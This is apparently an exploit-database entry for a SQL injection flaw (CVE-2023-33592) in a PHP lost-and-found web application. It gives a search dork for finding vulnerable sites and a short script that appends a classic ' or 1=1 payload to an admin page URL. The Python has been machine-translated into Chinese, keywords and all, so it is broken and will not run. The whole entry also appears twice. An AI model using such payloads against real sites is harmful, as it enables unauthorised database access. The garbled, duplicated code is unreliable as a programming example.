#利用标题:丢失并找到信息系统v1.0 -SQL注入
#日期: 2023-06-30
#Country:伊朗
#利用作者: Amirhossein Bahramizadeh
#类别: WebApps
#Dork :/php-lfis/admin/?page=system_info/contact_information
#在: Windows/Linux上测试
#CVE : CVE-2023-33592
导入请求
#脆弱组件的URL
url='http://example.com/php-lfis/admin/?page=system_info/contact_information'
#注入SQL查询以利用漏洞
有效载荷=''或1=1-'
#带有注入有效载荷的请求
响应=requests.get(url +有效载荷)
#检查SQL注入是否成功
如果响应中的“ admin” .text:
打印('SQL注入成功!')
其他:
打印('SQL注射失败。')
#日期: 2023-06-30
#Country:伊朗
#利用作者: Amirhossein Bahramizadeh
#类别: WebApps
#Dork :/php-lfis/admin/?page=system_info/contact_information
#在: Windows/Linux上测试
#CVE : CVE-2023-33592
导入请求
#脆弱组件的URL
url='http://example.com/php-lfis/admin/?page=system_info/contact_information'
#注入SQL查询以利用漏洞
有效载荷=''或1=1-'
#带有注入有效载荷的请求
响应=requests.get(url +有效载荷)
#检查SQL注入是否成功
如果响应中的“ admin” .text:
打印('SQL注入成功!')
其他:
打印('SQL注射失败。')
